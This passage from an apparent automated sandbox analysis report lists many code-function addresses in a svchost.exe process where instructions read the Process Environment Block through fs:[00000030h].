                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4260B mov eax, dword ptr fs:[00000030h]2_2_03C4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72619 mov eax, dword ptr fs:[00000030h]2_2_03C72619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4E627 mov eax, dword ptr fs:[00000030h]2_2_03C4E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C66620 mov eax, dword ptr fs:[00000030h]2_2_03C66620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C68620 mov eax, dword ptr fs:[00000030h]2_2_03C68620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3262C mov eax, dword ptr fs:[00000030h]2_2_03C3262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6E5CF mov eax, dword ptr fs:[00000030h]2_2_03C6E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6E5CF mov eax, dword ptr fs:[00000030h]2_2_03C6E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C365D0 mov eax, dword ptr fs:[00000030h]2_2_03C365D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6A5D0 mov eax, dword ptr fs:[00000030h]2_2_03C6A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6A5D0 mov eax, dword ptr fs:[00000030h]2_2_03C6A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03C5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03C5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03C5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03C5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03C5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03C5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03C5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03C5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C325E0 mov eax, dword ptr fs:[00000030h]2_2_03C325E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6C5ED mov eax, dword ptr fs:[00000030h]2_2_03C6C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6C5ED mov eax, dword ptr fs:[00000030h]2_2_03C6C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C32582 mov eax, dword ptr fs:[00000030h]2_2_03C32582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C32582 mov ecx, dword ptr fs:[00000030h]2_2_03C32582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C64588 mov eax, dword ptr fs:[00000030h]2_2_03C64588
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6E59C mov eax, dword ptr fs:[00000030h]2_2_03C6E59C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB05A7 mov eax, dword ptr fs:[00000030h]2_2_03CB05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB05A7 mov eax, dword ptr fs:[00000030h]2_2_03CB05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB05A7 mov eax, dword ptr fs:[00000030h]2_2_03CB05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C545B1 mov eax, dword ptr fs:[00000030h]2_2_03C545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C545B1 mov eax, dword ptr fs:[00000030h]2_2_03C545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C38550 mov eax, dword ptr fs:[00000030h]2_2_03C38550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C38550 mov eax, dword ptr fs:[00000030h]2_2_03C38550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6656A mov eax, dword ptr fs:[00000030h]2_2_03C6656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6656A mov eax, dword ptr fs:[00000030h]2_2_03C6656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6656A mov eax, dword ptr fs:[00000030h]2_2_03C6656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC6500 mov eax, dword ptr fs:[00000030h]2_2_03CC6500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D04500 mov eax, dword ptr fs:[00000030h]2_2_03D04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D04500 mov eax, dword ptr fs:[00000030h]2_2_03D04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D04500 mov eax, dword ptr fs:[00000030h]2_2_03D04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D04500 mov eax, dword ptr fs:[00000030h]2_2_03D04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D04500 mov eax, dword ptr fs:[00000030h]2_2_03D04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D04500 mov eax, dword ptr fs:[00000030h]2_2_03D04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D04500 mov eax, dword ptr fs:[00000030h]2_2_03D04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40535 mov eax, dword ptr fs:[00000030h]2_2_03C40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40535 mov eax, dword ptr fs:[00000030h]2_2_03C40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40535 mov eax, dword ptr fs:[00000030h]2_2_03C40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40535 mov eax, dword ptr fs:[00000030h]2_2_03C40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40535 mov eax, dword ptr fs:[00000030h]2_2_03C40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40535 mov eax, dword ptr fs:[00000030h]2_2_03C40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5E53E mov eax, dword ptr fs:[00000030h]2_2_03C5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5E53E mov eax, dword ptr fs:[00000030h]2_2_03C5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5E53E mov eax, dword ptr fs:[00000030h]2_2_03C5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5E53E mov eax, dword ptr fs:[00000030h]2_2_03C5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5E53E mov eax, dword ptr fs:[00000030h]2_2_03C5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C304E5 mov ecx, dword ptr fs:[00000030h]2_2_03C304E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CEA49A mov eax, dword ptr fs:[00000030h]2_2_03CEA49A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C364AB mov eax, dword ptr fs:[00000030h]2_2_03C364AB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C644B0 mov ecx, dword ptr fs:[00000030h]2_2_03C644B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CBA4B0 mov eax, dword ptr fs:[00000030h]2_2_03CBA4B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6E443 mov eax, dword ptr fs:[00000030h]2_2_03C6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6E443 mov eax, dword ptr fs:[00000030h]2_2_03C6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6E443 mov eax, dword ptr fs:[00000030h]2_2_03C6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6E443 mov eax, dword ptr fs:[00000030h]2_2_03C6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6E443 mov eax, dword ptr fs:[00000030h]2_2_03C6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6E443 mov eax, dword ptr fs:[00000030h]2_2_03C6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6E443 mov eax, dword ptr fs:[00000030h]2_2_03C6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6E443 mov eax, dword ptr fs:[00000030h]2_2_03C6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CEA456 mov eax, dword ptr fs:[00000030h]2_2_03CEA456
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2645D mov eax, dword ptr fs:[00000030h]2_2_03C2645D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5245A mov eax, dword ptr fs:[00000030h]2_2_03C5245A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CBC460 mov ecx, dword ptr fs:[00000030h]2_2_03CBC460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5A470 mov eax, dword ptr fs:[00000030h]2_2_03C5A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5A470 mov eax, dword ptr fs:[00000030h]2_2_03C5A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5A470 mov eax, dword ptr fs:[00000030h]2_2_03C5A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C68402 mov eax, dword ptr fs:[00000030h]2_2_03C68402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C68402 mov eax, dword ptr fs:[00000030h]2_2_03C68402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C68402 mov eax, dword ptr fs:[00000030h]2_2_03C68402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2E420 mov eax, dword ptr fs:[00000030h]2_2_03C2E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2E420 mov eax, dword ptr fs:[00000030h]2_2_03C2E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2E420 mov eax, dword ptr fs:[00000030h]2_2_03C2E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2C427 mov eax, dword ptr fs:[00000030h]2_2_03C2C427
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB6420 mov eax, dword ptr fs:[00000030h]2_2_03CB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB6420 mov eax, dword ptr fs:[00000030h]2_2_03CB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB6420 mov eax, dword ptr fs:[00000030h]2_2_03CB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB6420 mov eax, dword ptr fs:[00000030h]2_2_03CB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB6420 mov eax, dword ptr fs:[00000030h]2_2_03CB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB6420 mov eax, dword ptr fs:[00000030h]2_2_03CB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB6420 mov eax, dword ptr fs:[00000030h]2_2_03CB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6A430 mov eax, dword ptr fs:[00000030h]2_2_03C6A430
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C50BCB mov eax, dword ptr fs:[00000030h]2_2_03C50BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C50BCB mov eax, dword ptr fs:[00000030h]2_2_03C50BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C50BCB mov eax, dword ptr fs:[00000030h]2_2_03C50BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C30BCD mov eax, dword ptr fs:[00000030h]2_2_03C30BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C30BCD mov eax, dword ptr fs:[00000030h]2_2_03C30BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C30BCD mov eax, dword ptr fs:[00000030h]2_2_03C30BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDEBD0 mov eax, dword ptr fs:[00000030h]2_2_03CDEBD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C38BF0 mov eax, dword ptr fs:[00000030h]2_2_03C38BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C38BF0 mov eax, dword ptr fs:[00000030h]2_2_03C38BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C38BF0 mov eax, dword ptr fs:[00000030h]2_2_03C38BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5EBFC mov eax, dword ptr fs:[00000030h]2_2_03C5EBFC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CBCBF0 mov eax, dword ptr fs:[00000030h]2_2_03CBCBF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40BBE mov eax, dword ptr fs:[00000030h]2_2_03C40BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40BBE mov eax, dword ptr fs:[00000030h]2_2_03C40BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE4BB0 mov eax, dword ptr fs:[00000030h]2_2_03CE4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE4BB0 mov eax, dword ptr fs:[00000030h]2_2_03CE4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE4B4B mov eax, dword ptr fs:[00000030h]2_2_03CE4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE4B4B mov eax, dword ptr fs:[00000030h]2_2_03CE4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D02B57 mov eax, dword ptr fs:[00000030h]2_2_03D02B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D02B57 mov eax, dword ptr fs:[00000030h]2_2_03D02B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D02B57 mov eax, dword ptr fs:[00000030h]2_2_03D02B57
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D02B57 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CC6B40 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CC6B40 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CFAB40 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CD8B42 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C28B50 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CDEB50 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C2CB7E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D04B00 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CAEB1D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CAEB1D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CAEB1D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CAEB1D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CAEB1D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CAEB1D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CAEB1D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CAEB1D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CAEB1D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C5EB20 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C5EB20 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CF8B28 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CF8B28 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C86ACC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C86ACC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C86ACC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C30AD0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C64AD0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C64AD0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C6AAEE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C6AAEE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C3EA80 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C3EA80 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C3EA80 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C3EA80 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C3EA80 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C3EA80 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C3EA80 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C3EA80 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C3EA80 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D04A80 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C68A90 mov edx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C38AA0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C38AA0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C86AA4 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C36A50 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C36A50 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C36A50 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C36A50 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C36A50 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C36A50 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C36A50 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C40A5B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C40A5B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C6CA6F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C6CA6F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C6CA6F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CDEA60 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CACA72 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CACA72 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CBCA11 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C6CA24 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C5EA2E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C54A35 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C54A35 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C6CA38 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CC69C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C649D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CFA9D3 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CBE9E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C629F9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C629F9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C309AD mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C309AD mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CB89B3 mov esi, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CB89B3 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CB89B3 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CB0946 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D04940 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C56962 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C56962 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C56962 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C7096E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C7096E mov edx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C7096E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CD4978 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CD4978 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CBC97C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CAE908 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CAE908 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CBC912 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C28918 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C28918 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CB892A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CC892B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C5E8C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D008C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CFA8E4 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C6C8F9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C6C8F9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C30887 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CBC89D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C42840 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C60854 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C34859 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C34859 mov eax, dword ptr fs:[00000030h]
